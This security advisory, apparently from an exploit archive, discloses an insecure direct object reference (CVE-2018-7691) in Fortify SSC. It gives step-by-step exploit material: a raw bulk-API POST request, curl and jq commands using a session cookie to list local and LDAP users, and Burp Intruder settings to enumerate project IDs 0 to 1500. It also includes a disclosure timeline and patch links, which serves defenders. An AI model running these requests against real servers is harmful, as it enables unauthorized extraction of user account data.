what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Fortify SSC 17.10 / 17.20 / 18.10 User Detail Insecure Direct Object Reference

Fortify SSC 17.10 / 17.20 / 18.10 User Detail Insecure Direct Object Reference
Posted Dec 13, 2018
Authored by Alt3kx

Fortify Software Security Center versions 17.10, 17.20, and 18.10 suffer from an insecure direct object reference vulnerability related to extracting local and ldap users.

tags | exploit, local
advisories | CVE-2018-7691
SHA-256 | f5f61f0e91fb1492f3cc43981bb89d49f791427a38840fc17d42980c9a25194c

Fortify SSC 17.10 / 17.20 / 18.10 User Detail Insecure Direct Object Reference

Change Mirror Download
Details
================
Software: Fortify SSC (Software Security Center)
Version: 17.10, 17.20 & 18.10
Homepage: https://www.microfocus.com
Advisory report: https://github.com/alt3kx/CVE-2018-7691
CVE: CVE-2018-7691
CVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
CWE-639

Description
================
REST API contains Insecure direct object references (IDOR) allowing and extracting arbitrary details of the Local and LDAP users via POST method

Vulnerability
================
Fortify SSC (Software Security Center) 17.10, does not properly check ownership of "authEntities", which allows remote authenticated (view-only) users
to read arbitrary details via API bulk parameter to /api/v1/projectVersions/{NUMBER}/authEntities

Note: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process.


Proof of concept
================

Pre-requisites:

- Curl command deployed (Windows or Linux)
- jq command deployed (for parsing JSON fields), (Windows or Linux)
- Burpsuite Free/Por deployed or any other Proxy to catch/send the request (optional)

Step (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted),

The URL normally is avaiable as following:

Target: https://fortifyserver.com/ssc/#/

Step (2): Once logged extract the Cookie field, the format normally as following: "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default

Step (4): The offending POST is:

POST /ssc/api/v1/bulk HTTP/1.1
Host: fortifyserver.com
Connection: close
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;
Content-Length: 123

{"requests":[{"uri":"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities","httpVerb":"GET"}]}\x0d\x0a


Step (5): Test the first POST (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following:

# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk

-H "Host: fortifyserver.com"
-H "Connection: close"
-H "Accept: application/json, text/plain, */*"
-H "X-Requested-With: XMLHttpRequest"
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
-H "Content-Type: application/json;charset=UTF-8"
-H "Accept-Encoding: gzip, deflate"
-H "Accept-Language: en-US,en;q=0.9"
-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
--data-binary "{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a"
--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .responseCode'

You should see the following response:

200

Step (6): Now extract all local and LDAP users registered into Fortify SSC server:

Payload: /api/v1/projectVersions/{NUMBER}/authEntities, see the field "--data-binary" below and change the number as following:

# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk

-H "Host: fortifyserver.com"
-H "Connection: close"
-H "Accept: application/json, text/plain, */*"
-H "X-Requested-With: XMLHttpRequest"
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
-H "Content-Type: application/json;charset=UTF-8"
-H "Accept-Encoding: gzip, deflate"
-H "Accept-Language: en-US,en;q=0.9"
-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
--data-binary "{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a"
--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .data[] .entityName'

You should see the following response with users available

"admin"
"sca"
"alex"

[../snip]

Step (7): Automate with BurpSuite Pro/Free choose:

Payload Positions: "Intruder Tab -> Positions" highlight as following:


-> /api/v1/projectVersions/SS1SS/authEntities


Payloads set: "Intruder Tab -> Payloads" with the following data:


-> Payload set: 1

-> Payload type: Numbers


Payload Options [Numbers]:


-> Type: Sequential

-> From: 0

-> To: 1500

-> Step: 1


Then start attack
Have fun!

Have fun!


Mitigations
================
Install the latest patches availabe here:
https://softwaresupport.softwaregrp.com/doc/KM03298201

Disclosure policy
================
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.

This vulnerability will be published if we do not receive a response to this report with 10 days.

Timeline
================

2018-05-24: Discovered
2018-05-25: Retest PRO environment
2018-05-31: Vendor notification, two issues found
2018-05-31: Vendor feedback received
2018-06-01: Internal communication
2018-06-01: Vendor feedback, two issues are confirmed
2018-06-05: Vendor notification, new issue found
2018-06-06: Vendor feedback, evaluating High submission
2018-06-08: Vendor feedback, High issue is confirmed
2018-06-19: Researcher, reminder sent
2018-06-22: Vendor feedback, summary of CVEs handled as official way
2018-06-26: Vendor feedback, official Hotfix for High issue available to test
2018-06-29: Researcher feedback
2018-07-02: Researcher feedback
2018-07-04: Researcher feedback, Hotfix tested on QA environment
2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018
2018-08-02: Reminder to vendor, feedback received OK!
2018-09-26: Reminder to vendor, feedback received OK!
2018-09-26: Fixes received from the vendor
2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem
2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem
2018-10-11: Feedback from the vendor, technical details provided to the researcher
2018-10-16: Fixes now tested on QA environment
2018-11-08: Reminder received from the vendor, feedback provided by researcher
2018-11-09: Re-rest fixes on QA environment
2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed
2018-11-21: Researcher feedback
2018-11-23: Fixes working well/confirmed by researcher
2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.
2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure
2018-11-26: Agreements with the vendor to publish the CVE/Advisory.
2018-12-12: Public report

Discovered by:
Alex Hernandez aka alt3kx:
================
Please visit https://github.com/alt3kx for more information.

My current exploit list @exploit-db:
https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close